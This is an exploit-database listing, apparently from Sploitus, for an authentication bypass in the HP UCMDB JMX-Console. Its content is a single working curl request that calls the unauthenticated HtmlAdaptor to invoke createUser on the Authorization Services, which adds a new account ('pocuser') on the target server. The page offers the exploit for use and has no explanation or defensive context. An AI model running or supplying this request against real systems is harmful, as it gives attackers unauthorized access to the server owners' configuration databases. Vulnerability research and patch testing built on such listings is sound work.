Sploitus

Exploit for Hewlett-Packard UCMDB - JMX-Console Authentication Bypass

seebug · 2015-09-06

Exploit Code

MARKDOWN3 lines
## https://sploitus.com/exploit?id=SSV:89314
curl -I
"http://site:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"